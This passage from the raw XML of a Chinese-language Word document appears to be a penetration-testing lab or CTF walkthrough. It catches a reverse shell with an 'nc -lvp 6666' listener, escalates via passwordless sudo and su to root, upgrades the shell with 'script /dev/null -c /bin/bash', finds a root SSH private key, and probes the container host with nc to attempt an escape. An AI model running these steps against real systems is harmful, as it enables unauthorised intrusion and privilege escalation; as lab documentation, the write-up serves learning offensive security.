          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>开启监听，输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>lvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6666</w:t>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>开启监听后，点击该文件，反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>成功建立。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154C1677" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00B21FFF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D3F5D6E" wp14:editId="6DF9EBFD">
            <wp:extent cx="5274310" cy="2557780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="118700466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04660" name="图片 1" descr="图形用户界面, 文本, 应用程序, 电子邮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EEAF" w14:textId="568097E9" w:rsidR="00B21FFF" w:rsidRPr="00B21FFF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</w:p>
    <w:p w14:paraId="1EE4BE37" w14:textId="1F459F90" w:rsidR="003E35C1" w:rsidRDefault="003E35C1" w:rsidP="003E35C1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权限提升</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D95875F" w14:textId="04CAC118" w:rsidR="00345099" w:rsidRDefault="00345099" w:rsidP="00355038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345099">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>输入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-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看用户</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00355038"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权限，</w:t>
      </w:r>
      <w:r w:rsidR="00355038">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidR="00355038">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidR="00355038">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可以无需密码运行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00355038"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 w:rsidR="00355038">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令，运行</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00355038"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 w:rsidR="00355038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 w:rsidR="00355038">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00355038">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>切换至</w:t>
      </w:r>
      <w:r w:rsidR="00355038">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00355038">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用户，</w:t>
      </w:r>
      <w:r w:rsidR="008C6FBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008C6FBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>scritp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008C6FBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /dev/null -c /bin/bash</w:t>
      </w:r>
      <w:r w:rsidR="008C6FBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>建立一个交互式</w:t>
      </w:r>
      <w:r w:rsidR="008C6FBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="008C6FBF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00D63D01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>拿到</w:t>
      </w:r>
      <w:r w:rsidR="00D63D01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00D63D01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidR="00C060CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229EF644" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00355038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C9735BF" wp14:editId="132EE456">
            <wp:extent cx="5274310" cy="1046480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="199860779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07795" name="图片 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8516" w14:textId="1F654EFB" w:rsidR="00345099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</w:p>
    <w:p w14:paraId="43935933" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00D63D01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C39E80C" wp14:editId="280DD270">
            <wp:extent cx="5274310" cy="748030"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="30823339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33399" name="图片 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DFBE" w14:textId="79E4910C" w:rsidR="00355038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</w:p>
    <w:p w14:paraId="7DB8CD9A" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00616499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B884877" wp14:editId="59BAD405">
            <wp:extent cx="5274310" cy="3004820"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="158973297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32970" name="图片 1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662A" w14:textId="45D12ABB" w:rsidR="00616499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</w:p>
    <w:p w14:paraId="504F39CE" w14:textId="31A80BAB" w:rsidR="00C060CF" w:rsidRDefault="00C060CF" w:rsidP="00D63D01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查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>家目录并没有发现什么文件，</w:t>
      </w:r>
      <w:r w:rsidR="00C272FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>不过存在一个隐藏目录</w:t>
      </w:r>
      <w:r w:rsidR="00C272FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.ssh</w:t>
      </w:r>
      <w:r w:rsidR="00C272FD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00202B02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>进入后查看发现存在一个</w:t>
      </w:r>
      <w:r w:rsidR="00202B02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidR="00202B02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>私</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00202B02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>钥</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00202B02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00202B02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>is_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00202B02">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>输入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fdisk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-l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidR="005546E6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>回复没有该命令，</w:t>
      </w:r>
      <w:r w:rsidR="00351BA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0071154B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0071154B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看并没有找到某个网卡具有</w:t>
      </w:r>
      <w:r w:rsidR="0071154B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.150</w:t>
      </w:r>
      <w:r w:rsidR="0071154B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0071154B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0071154B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F86B0C" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00202B02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2D1E178" wp14:editId="4848DC01">
            <wp:extent cx="5133975" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="82602499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24993" name="图片 1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424B" w14:textId="62226BF3" w:rsidR="00202B02" w:rsidRPr="00202B02" w:rsidRDefault="00B024AF" w:rsidP="00B024AF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</w:p>
    <w:p w14:paraId="38D29F4D" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="005546E6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871BDB7" wp14:editId="068FFA3D">
            <wp:extent cx="2733675" cy="657225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1209378148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78148" name="图片 1" descr="图形用户界面, 网站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0B41" w14:textId="7E5A4E48" w:rsidR="005546E6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</w:p>
    <w:p w14:paraId="528919F7" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="009D4BAE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9642968" wp14:editId="453F3094">
            <wp:extent cx="3823041" cy="3855720"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="113194688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46882" name="图片 1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38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3456" w14:textId="6CA1F361" w:rsidR="00351BA9" w:rsidRPr="00355038" w:rsidRDefault="00B024AF" w:rsidP="00B024AF">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="24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</w:p>
    <w:p w14:paraId="15AC13E7" w14:textId="00BDB37E" w:rsidR="005D091E" w:rsidRDefault="00D63D01" w:rsidP="00E52F7C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容器逃逸</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAF654C" w14:textId="0D01B294" w:rsidR="00F7049B" w:rsidRDefault="00B70BB0" w:rsidP="005E413E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</w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00E52F7C" w:rsidRPr="005E413E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E52F7C" w:rsidRPr="005E413E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> route</w:t>
      </w:r>
      <w:r w:rsidR="00E52F7C" w:rsidRPr="005E413E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令查看</w:t>
      </w:r>
      <w:r w:rsidR="0034081B" w:rsidRPr="005E413E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>路由配置，发现</w:t>
      </w:r>
      <w:r w:rsidR="0034081B" w:rsidRPr="005E413E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>10.0.3.1</w:t>
      </w:r>
      <w:r w:rsidR="0034081B" w:rsidRPr="005E413E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是网关，</w:t>
      </w:r>
      <w:r w:rsidR="005E413E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>也就是说他是宿主机</w:t>
      </w:r>
      <w:r w:rsidR="00F74378">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>在容器侧的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F74378">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F74378">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00C830CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>防火墙虽然过滤了</w:t>
      </w:r>
      <w:r w:rsidR="00951BC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>外部对</w:t>
      </w:r>
      <w:r w:rsidR="00C830CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="00C830CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
      <w:r w:rsidR="00951BC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的访问</w:t>
      </w:r>
      <w:r w:rsidR="00C830CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，但是并不一定会过滤通</w:t>
      </w:r>
      <w:r w:rsidR="00951BC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>容器</w:t>
      </w:r>
      <w:r w:rsidR="00C830CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>过内部访问，</w:t>
      </w:r>
      <w:r w:rsidR="00F74378">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>尝试</w:t>
      </w:r>
      <w:r w:rsidR="000B0A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>连接宿主机的</w:t>
      </w:r>
      <w:r w:rsidR="000B0A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="000B0A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口，输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000B0A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000B0A6C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:r w:rsidR="00752F89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>v 10.0.3.1 22</w:t>
      </w:r>
      <w:r w:rsidR="00752F89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00A67B14">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>并没有建立连接，证明</w:t>
      </w:r>
      <w:r w:rsidR="00C830CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>宿主机并未允许在容器中与宿主机的</w:t>
      </w:r>
      <w:r w:rsidR="00C830CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r w:rsidR="00C830CF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口建立连接</w:t>
      </w:r>
      <w:r w:rsidR="00951BC4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
